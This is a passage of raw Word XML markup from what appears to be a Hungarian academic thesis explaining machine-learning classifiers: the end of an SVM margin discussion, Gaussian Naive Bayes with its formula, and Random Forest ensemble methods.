          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, megkapjuk </w:t>
      </w:r>
      <w:r w:rsidR="00632924">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="009E1FE8" w:rsidRPr="009E1FE8">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>zt az értéktartományt ([-1,1]), amely margóként működik.</w:t>
      </w:r>
      <w:r w:rsidR="00B86C49">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B86C49" w:rsidRPr="00B86C49">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Ha</w:t>
      </w:r>
      <w:r w:rsidR="00B86C49">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B86C49" w:rsidRPr="00B86C49">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a kimenet nagyobb, mint 1</w:t>
      </w:r>
      <w:r w:rsidR="001F3B58">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</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r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="hu-HU"/>
          </w:rPr>
          <m:t>+b≥1</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidR="001F3B58">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00B86C49" w:rsidRPr="00B86C49">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, akkor azonosítjuk egy osztállyal</w:t>
      </w:r>
      <w:r w:rsidR="007F59D7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</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r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="hu-HU"/>
          </w:rPr>
          <m:t>=1</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidR="007F59D7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00B86C49" w:rsidRPr="00B86C49">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, és ha a kimenet </w:t>
      </w:r>
      <w:r w:rsidR="0024566E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">kisebb, mint </w:t>
      </w:r>
      <w:r w:rsidR="00B86C49" w:rsidRPr="00B86C49">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>-1</w:t>
      </w:r>
      <w:r w:rsidR="007F59D7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</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r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="hu-HU"/>
          </w:rPr>
          <m:t>+b≤-1</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidR="007F59D7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00B86C49" w:rsidRPr="00B86C49">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, akkor egy másik osztállyal</w:t>
      </w:r>
      <w:r w:rsidR="007F59D7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</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r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="hu-HU"/>
          </w:rPr>
          <m:t>=-1</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidR="007F59D7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00B86C49" w:rsidRPr="00B86C49">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035AAE4F" w14:textId="77777777" w:rsidR="00900038" w:rsidRPr="00900038" w:rsidRDefault="00900038" w:rsidP="00D33DD0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31E6F084" w14:textId="3F9C4BD1" w:rsidR="00D33DD0" w:rsidRPr="00921E07" w:rsidRDefault="00BA1562"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8" w:name="_Toc71471974"/>
      <w:r w:rsidRPr="00921E07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Gaussian </w:t>
      </w:r>
      <w:r w:rsidR="00D33DD0" w:rsidRPr="00921E07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Naive Bayes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="0F8277F9" w14:textId="1B4155F0" w:rsidR="00CB6F4D" w:rsidRDefault="00CB6F4D" w:rsidP="00D33DD0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5741D85B" w14:textId="77C576C5" w:rsidR="00490DB4" w:rsidRDefault="00F92D3C" w:rsidP="00F92D3C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F92D3C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A Naiv Bayes a felügyelt gépi tanulási osztályozási algoritmusok</w:t>
      </w:r>
      <w:r w:rsidR="006E105D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> egy</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92D3C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> csoportja, amely a Bayes-tételen alapul</w:t>
      </w:r>
      <w:r w:rsidR="001330F6">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> és </w:t>
      </w:r>
      <w:r w:rsidR="001330F6" w:rsidRPr="001330F6">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>feltételezi, hogy az általa használt funkciók mindegyike feltételesen független egymástól, adott osztályban.</w:t>
      </w:r>
      <w:r w:rsidR="00905CD2">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00930737" w:rsidRPr="00930737">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Természetesen ezek a függetlenségi feltételezések ritkán igazak, de a gyakorlatban a Naiv Bayes-modellek meglepően jól teljesítettek, még olyan összetett feladatoknál is, ahol egyértelmű, hogy az erős a függetlenségi feltételezések hamisak.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AA5D67" w14:textId="6B0B2F09" w:rsidR="00490DB4" w:rsidRDefault="00490DB4" w:rsidP="00AE6238">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27185E16" w14:textId="4799F6EA" w:rsidR="00CD7F03" w:rsidRDefault="00CD7F03" w:rsidP="00AE6238">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <m:oMathPara>
        <m:oMath>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
            <m:t>P</m:t>
          </m:r>
          <m:d>
            <m:dPr>
              <m:ctrlPr>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:i/>
                  <w:lang w:val="hu-HU"/>
                </w:rPr>
              </m:ctrlPr>
            </m:dPr>
            <m:e>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:lang w:val="hu-HU"/>
                </w:rPr>
                <m:t>A</m:t>
              </m:r>
            </m:e>
            <m:e>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e>
          </m:d>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
            <m:t>=∝P</m:t>
          </m:r>
          <m:d>
            <m:dPr>
              <m:ctrlPr>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:i/>
                  <w:lang w:val="hu-HU"/>
                </w:rPr>
              </m:ctrlPr>
            </m:dPr>
            <m:e>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:lang w:val="hu-HU"/>
                </w:rPr>
                <m:t>A</m:t>
              </m:r>
            </m:e>
          </m:d>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
            <m:t>P</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e>
            <m:e>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:lang w:val="hu-HU"/>
                </w:rPr>
                <m:t>A</m:t>
              </m:r>
            </m:e>
          </m:d>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
              <w:lang w:val="hu-HU"/>
            </w:rPr>
            <m:t>≈∝P(A)</m:t>
          </m:r>
          <m:nary>
            <m:naryPr>
              <m:chr m:val="∏"/>
              <m:limLoc m:val="undOvr"/>
              <m:ctrlPr>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:i/>
                  <w:lang w:val="hu-HU"/>
                </w:rPr>
              </m:ctrlPr>
            </m:naryPr>
            <m:sub>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:lang w:val="hu-HU"/>
                </w:rPr>
                <m:t>i=1</m:t>
              </m:r>
            </m:sub>
            <m:sup>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:lang w:val="hu-HU"/>
                </w:rPr>
                <m:t>n</m:t>
              </m:r>
            </m:sup>
            <m:e>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:lang w:val="hu-HU"/>
                </w:rPr>
                <m:t>P(</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i</m:t>
                  </m:r>
                </m:sub>
              </m:sSub>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:lang w:val="hu-HU"/>
                </w:rPr>
                <m:t>|A)</m:t>
              </m:r>
            </m:e>
          </m:nary>
        </m:oMath>
      </m:oMathPara>
    </w:p>
    <w:p w14:paraId="269181BE" w14:textId="2B2AF2EE" w:rsidR="00CD7F03" w:rsidRDefault="000D4835" w:rsidP="00CD7F03">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00CD7F03">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00923B54">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00CD7F03">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000D0F75">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>4.1</w:t>
      </w:r>
      <w:r w:rsidR="00CD7F03">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="000D0F75">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00CD7F03">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">s ábra: </w:t>
      </w:r>
      <w:r w:rsidR="00493563">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Naive Bayes tétele</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3A1595" w14:textId="77777777" w:rsidR="00CD7F03" w:rsidRDefault="00CD7F03" w:rsidP="00AE6238">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A9CC5A6" w14:textId="64BFFCFF" w:rsidR="006C2404" w:rsidRPr="00840DF5" w:rsidRDefault="00D3635A" w:rsidP="00840DF5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D3635A">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Háromféle </w:t>
      </w:r>
      <w:r w:rsidR="00D35A52">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Naive</w:t>
      </w:r>
      <w:r w:rsidRPr="00D3635A">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bayes osztályozó létezik</w:t>
      </w:r>
      <w:r w:rsidR="009753F1">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="002056E1" w:rsidRPr="002056E1">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00121994">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002056E1" w:rsidRPr="008E52DC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>normál</w:t>
      </w:r>
      <w:r w:rsidR="00121994" w:rsidRPr="008E52DC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Gauss-)</w:t>
      </w:r>
      <w:r w:rsidR="002056E1" w:rsidRPr="008E52DC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> eloszlás</w:t>
      </w:r>
      <w:r w:rsidR="002056E1" w:rsidRPr="002056E1">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> alapján történő osztályozáshoz a Gauss</w:t>
      </w:r>
      <w:r w:rsidR="002056E1">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ian</w:t>
      </w:r>
      <w:r w:rsidR="002056E1" w:rsidRPr="002056E1">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002056E1">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Naive</w:t>
      </w:r>
      <w:r w:rsidR="002056E1" w:rsidRPr="002056E1">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bayes-t használják</w:t>
      </w:r>
      <w:r w:rsidR="006A3C40">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, e</w:t>
      </w:r>
      <w:r w:rsidR="0029608B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">kkor </w:t>
      </w:r>
      <w:r w:rsidR="00E93602">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Naive </w:t>
      </w:r>
      <w:r w:rsidR="0029608B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Bayes tétel</w:t>
      </w:r>
      <w:r w:rsidR="00840DF5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00427E29">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00792D44">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>az új adattömb minden szavához</w:t>
      </w:r>
      <w:r w:rsidR="00BA17EE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <m:oMath>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oMath>
      <w:r w:rsidR="00BA17EE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00792D44">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> ad egy valószínűségi értéket az adott osztályra </w:t>
      </w:r>
      <w:r w:rsidR="007800BA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="hu-HU"/>
          </w:rPr>
          <m:t>A</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidR="007800BA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00792D44">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>vonatkozóan</w:t>
      </w:r>
      <w:r w:rsidR="00972E66">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, amelyek a számítás végén összegzésre kerülnek. </w:t>
      </w:r>
      <w:r w:rsidR="002005AC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Értelemszerűen az az osztály kerül kiválasztásra, amelynek nagyobb a valószínűsége.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7BC086" w14:textId="77777777" w:rsidR="00333871" w:rsidRDefault="00333871" w:rsidP="00D33DD0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="195C7E58" w14:textId="25BF7609" w:rsidR="00D33DD0" w:rsidRPr="00921E07" w:rsidRDefault="00D33DD0"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9" w:name="_Toc71471975"/>
      <w:r w:rsidRPr="00921E07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Random Forest</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="7B027767" w14:textId="28AB94AB" w:rsidR="00CB6F4D" w:rsidRDefault="00CB6F4D" w:rsidP="00D33DD0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59732D7A" w14:textId="10E8151A" w:rsidR="00CB6F4D" w:rsidRDefault="007C5999" w:rsidP="00925525">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Az együttes </w:t>
      </w:r>
      <w:r w:rsidR="00D223F7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">tanulási </w:t>
      </w:r>
      <w:r w:rsidR="00AA796B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>módszerek</w:t>
      </w:r>
      <w:r w:rsidR="003C2FCB">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="008033A4" w:rsidRPr="008033A4">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Ensemble Methods</w:t>
      </w:r>
      <w:r w:rsidR="003C2FCB">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="006B0326">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>technikailag</w:t>
      </w:r>
      <w:r w:rsidR="004C17B6" w:rsidRPr="004C17B6">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> több felügyelt tanulási modellt tartalmaznak, amelyeket egyénileg képeznek ki</w:t>
      </w:r>
      <w:r w:rsidR="00C64047">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>. A</w:t>
      </w:r>
      <w:r w:rsidR="004C17B6" w:rsidRPr="004C17B6">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">z eredmények különböző módon egyesülnek a végső </w:t>
      </w:r>
      <w:r w:rsidR="00C26DB5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidR="004C17B6" w:rsidRPr="004C17B6">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>jóslat</w:t>
      </w:r>
      <w:r w:rsidR="00C26DB5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="004C17B6" w:rsidRPr="004C17B6">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> elérése érdekében</w:t>
      </w:r>
      <w:r w:rsidR="00291125">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, e</w:t>
      </w:r>
      <w:r w:rsidR="00AE425C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>z által</w:t>
      </w:r>
      <w:r w:rsidR="004C17B6" w:rsidRPr="004C17B6">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> az </w:t>
      </w:r>
      <w:r w:rsidR="0038351F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>azok</w:t>
      </w:r>
      <w:r w:rsidR="00B51714">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>nak</w:t>
      </w:r>
      <w:r w:rsidR="004C17B6" w:rsidRPr="004C17B6">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> nagyobb a prediktív ereje, mint bármelyik önálló</w:t>
      </w:r>
      <w:r w:rsidR="004C3D7C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C17B6" w:rsidRPr="004C17B6">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>tanulási algoritmu</w:t>
      </w:r>
      <w:r w:rsidR="009C1ECC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>sénak</w:t>
      </w:r>
      <w:r w:rsidR="004C17B6" w:rsidRPr="004C17B6">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA449A2" w14:textId="3C478D0A" w:rsidR="003D4B81" w:rsidRPr="009B10D1" w:rsidRDefault="000B2A0D" w:rsidP="003008DF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A Random Forest osztályozás egy, az együttes tanulási módszerek közül</w:t>
      </w:r>
      <w:r w:rsidR="000C4388">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, amely </w:t>
      </w:r>
      <w:r w:rsidR="003A4183">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">lényegében </w:t>
      </w:r>
      <w:r w:rsidR="00B43DAC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>több</w:t>
      </w:r>
      <w:r w:rsidR="000C4388" w:rsidRPr="000C4388">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> döntési fát összesít, néhány hasznos módosítással</w:t>
      </w:r>
      <w:r w:rsidR="000C4388">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>. Egyrészt a</w:t>
      </w:r>
      <w:r w:rsidR="000C4388" w:rsidRPr="000C4388">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">z egyes csomópontokban felosztható funkciók száma a teljes érték bizonyos százalékára korlátozódik (ami hiperparaméter néven ismert). Ez biztosítja, hogy az együttes modell ne támaszkodjon túlzottan egyetlen egyedi tulajdonságra sem és felhasználja az összes </w:t>
      </w:r>
      <w:r w:rsidR="000C4388" w:rsidRPr="000C4388">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>potenciálisan prediktív tulajdonságot.</w:t>
      </w:r>
      <w:r w:rsidR="003008DF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Másrészt m</w:t>
      </w:r>
      <w:r w:rsidR="000C4388" w:rsidRPr="000C4388">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>inden fa egy véletlenszerű mintát vesz az eredeti adatsorból, amikor a felosztásokat létrehozza, és további véletlenszerűség-elemeket ad hozzá, amelyek megakadályozzák a túlillesztést</w:t>
      </w:r>
      <w:r w:rsidR="006959F8">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E65271" w14:textId="77777777" w:rsidR="00925525" w:rsidRDefault="00925525" w:rsidP="00D33DD0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05943326" w14:textId="25302EE6" w:rsidR="00333871" w:rsidRDefault="00132EB1" w:rsidP="00AA4C00">
      <w:pPr>
        <w:pStyle w:val="Cmsor2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
